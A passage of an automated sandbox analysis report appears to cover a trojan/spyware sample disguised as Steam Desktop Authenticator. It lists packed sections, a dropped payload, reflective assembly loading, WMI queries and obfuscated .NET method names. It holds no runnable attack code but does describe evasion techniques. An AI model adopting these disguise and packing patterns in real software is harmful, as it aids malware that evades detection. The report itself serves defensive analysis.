                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060EF00_2_0000000140060EF0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014004AF200_2_000000014004AF20
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014003CF200_2_000000014003CF20
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140010F600_2_0000000140010F60
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140046F700_2_0000000140046F70
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_000000014001BF800_2_000000014001BF80
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140044FB00_2_0000000140044FB0
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_003B944F2_2_003B944F
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_003B9D5B2_2_003B9D5B
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_00B4C5342_2_00B4C534
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_00B4E9752_2_00B4E975
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_00B4E9782_2_00B4E978
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_028D04502_2_028D0450
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_04E9031C2_2_04E9031C
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_04E9C0872_2_04E9C087
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 2_2_04E9C0982_2_04E9C098
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_006B944F14_2_006B944F
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_006B9D5B14_2_006B9D5B
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_02B4D44814_2_02B4D448
                    Source: C:\Users\user\AppData\Roaming\325.exeCode function: 14_2_02B4CB5014_2_02B4CB50
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\325.exe 20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400A6D70 appears 354 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 0000000140086C40 appears 51 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400A4F28 appears 34 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400A9358 appears 45 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 0000000140035BF0 appears 107 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 0000000140035870 appears 77 times
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: String function: 00000001400C2598 appears 38 times
                    Source: kS2dqbsDwD.exeStatic PE information: invalid certificate
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: 325.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: kS2dqbsDwD.exe, 00000000.00000002.306945204.0000000000880000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000000.201076729.000000014013D000.00000008.00020000.sdmpBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameOtxiH.exe2 vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exe, 00000000.00000002.306924616.0000000000850000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs kS2dqbsDwD.exe
                    Source: kS2dqbsDwD.exeBinary or memory string: OriginalFilenameSteam Desktop Authenticator.exeX vs kS2dqbsDwD.exe
                    Source: 325.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: kS2dqbsDwD.exeStatic PE information: Section: .MPRESS1 ZLIB complexity 1.00031240161
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/29@9/5
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140036D50 CreateProcessW,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,0_2_0000000140036D50
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400624E0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00000001400624E0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_00000001400C22C0 GetDiskFreeSpaceW,0_2_00000001400C22C0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140088BA0 LoadLibraryExW,EnumResourceNamesW,FindResourceW,LoadResource,LockResource,GetSystemMetrics,FindResourceW,LoadResource,LockResource,SizeofResource,CreateIconFromResourceEx,FreeLibrary,ExtractIconW,0_2_0000000140088BA0
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile created: C:\Users\user\AppData\Roaming\fieldJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile created: C:\Users\user\AppData\Local\Temp\tmpBE63.tmpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\325.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: kS2dqbsDwD.exeVirustotal: Detection: 20%
                    Source: kS2dqbsDwD.exeReversingLabs: Detection: 13%
                    Source: unknownProcess created: C:\Users\user\Desktop\kS2dqbsDwD.exe 'C:\Users\user\Desktop\kS2dqbsDwD.exe'
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeProcess created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess created: C:\Users\user\AppData\Roaming\325.exe {path}
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeProcess created: C:\Users\user\AppData\Roaming\325.exe C:\Users\user\AppData\Roaming\325.exe 325Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeProcess created: C:\Users\user\AppData\Roaming\325.exe {path}Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\325.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\325.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: kS2dqbsDwD.exeStatic PE information: Image base 0x140000000 > 0x60000000

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeUnpacked PE file: 0.2.kS2dqbsDwD.exe.140000000.2.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    .NET source code contains potential unpackerShow sources
                    Source: 325.exe.0.dr, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.cs.Net Code: TJbSoEaROH1pxHedh9d System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,0_2_0000000140060290
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                    Source: kS2dqbsDwD.exeStatic PE information: real checksum: 0x9a0ca should be: 0xa1dfe
                    Source: 325.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xf8b72
                    Source: kS2dqbsDwD.exeStatic PE information: section name: .MPRESS1
                    Source: kS2dqbsDwD.exeStatic PE information: section name: .MPRESS2
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CD08 pushad ; retf 0_3_0095CD11
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095F2A3 push esi; retf 0000h0_3_0095F2A4
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095F2A3 push esi; retf 0000h0_3_0095F2A4
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095F2A3 push esi; retf 0000h0_3_0095F2A4
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099BAD8 push esi; retn 0000h0_3_0099BADF
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099BAD8 push esi; retn 0000h0_3_0099BADF
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099BAD8 push esi; retn 0000h0_3_0099BADF
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099CACC push esp; ret 0_3_0099CADA
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099CACC push esp; ret 0_3_0099CADA
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099CACC push esp; ret 0_3_0099CADA
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099D9FB push edi; ret 0_3_0099DA9A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DF01 push ds; iretd 0_3_0099DFA5
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00993723 pushfd ; ret 0_3_00993725
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00993723 pushfd ; ret 0_3_00993725
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00993723 pushfd ; ret 0_3_00993725
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0099DA4B push edi; ret 0_3_0099DA9A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00996762 push es; retn 0002h0_3_0099677A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00996762 push es; retn 0002h0_3_0099677A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_00996762 push es; retn 0002h0_3_0099677A
                    Source: C:\Users\user\Desktop\kS2dqbsDwD.exeCode function: 0_3_0095CF80 push eax; iretd 0_3_0095CF81
                    Source: initial sampleStatic PE information: section name: .MPRESS1 entropy: 7.99951858505
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.5685116349
                    Source: 325.exe.0.dr, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 325.exe.0.dr, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 325.exe.0.dr, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 325.exe.0.dr, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 325.exe.0.dr, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 325.exe.0.dr, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 325.exe.0.dr, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 325.exe.0.dr, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 325.exe.0.dr, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 325.exe.0.dr, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.0.325.exe.3b0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
                    Source: 2.2.325.exe.3b0000.0.unpack, uNotepad/uNote.csHigh entropy of concatenated method names: '.ctor', 'get_fileName', 'set_fileName', 'Kaydet', 'DosyaAc', 'YaziRengiDegistir', 'YaziTipiDegistir', 'YaziBuyukHarfYap', 'YaziKucukHarfYap', 'Ara'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form_Main.csHigh entropy of concatenated method names: '.ctor', 'ResizeControls', 'Form_Main_Load', 'Form_Main_FormClosing', 'button_Convert_Click', 'Form_Main_Resize', 'button_Select_Click', 'button_Clear_Click', 'Form_Main_DragEnter', 'Form_Main_DragDrop'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MDSDDD.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'InitializeComponent', 'xQYrXMQK3oruP2n78EE', 'qI2V5sQmkMFPdZKK7RT', 'v2BxR9Q29gDG9OoMaun', 'Oy6h3XQJUWJ0pO5lsiJ', 'lvpUrfQFbZ41gMl8ChU', 'V9TqPbQ9L1478wb6Rri', 'AsM2hEQPFjt8MQXoJBn'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/Form1.csHigh entropy of concatenated method names: '.ctor', 'AddFormToTabPage', 'Form1_Load', 'toolButtonNew_Click', 'toolButtonSave_Click', 'toolButtonOpen_Click', 'kapatToolStripMenuItem_Click', 'yaziRengiToolStripMenuItem_Click', 'yaziTipiToolStripMenuItem_Click', 'hepsiBuyukToolStripMenuItem_Click'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/MainWindow.csHigh entropy of concatenated method names: '.ctor', 'Draw', 'ChooseFillType', 'StartSorting', 'Sorting', 'Sorting2', 'DisableControls', 'EnableControls', 'txtbSwapCost_TextChanged', 'txtbSwapCost2_TextChanged'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionToSort.csHigh entropy of concatenated method names: 'set_ModSwapCost', 'set_ModComparisonCost', '.ctor', 'BubbleSort', 'InsertionSort', 'SelectionSort', 'Merge', 'MergeSort', 'ShellSort', 'CombSort'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/CollectionOfElements.csHigh entropy of concatenated method names: 'get_GetPictureBox', 'get_modBuffer', 'getElementValue', 'getElementSepperation', 'getElementWidth', 'getElementColor', 'get_modHeight', 'get_modNumberOfElements', '.ctor', 'DrawElements'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/About.csHigh entropy of concatenated method names: '.ctor', 'btnOK_Click', 'Dispose', 'InitializeComponent', 'O7iYVnQ8fijTtIhHIa', 'LobEx4sRuX3pYvhqG1', 'wDtNXwHRAUHdKDIewc', 'Bjwo1gT75dUFXW4TKT', 'OHgtsoIUhxi7DTZZsj', 'FYQft6BgvEERMwMpIU'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/AramaFormu.csHigh entropy of concatenated method names: '.ctor', 'btnAra_Click', 'btnIptal_Click', 'Dispose', 'InitializeComponent', 'vq7PjyhUAd7MRkefWD', 'QoZQYfS9Radq0iYew9', 'HW5Pmc0r3FxacGfIMM', 'eR5IKkXfgPFddBVEtT', 'fqFEGAbrnWeHxXrodt'
                    Source: 14.0.325.exe.6b0000.0.unpack, uNotepad/TextUtility.csHigh entropy of concatenated method names: 'LoadTextToTextBox', 'QBTcamIJwnfhXp5d0d3', 'ykja5WIFRtXhAOiwvuL', 'rTCUjqI95QdxLALSyjg', 'mj4y5GIPVV7aGuQsJp4', 'WihXS9I2YQbW7IsCipf', 'tRp4m3IKYO0jK390DjC'
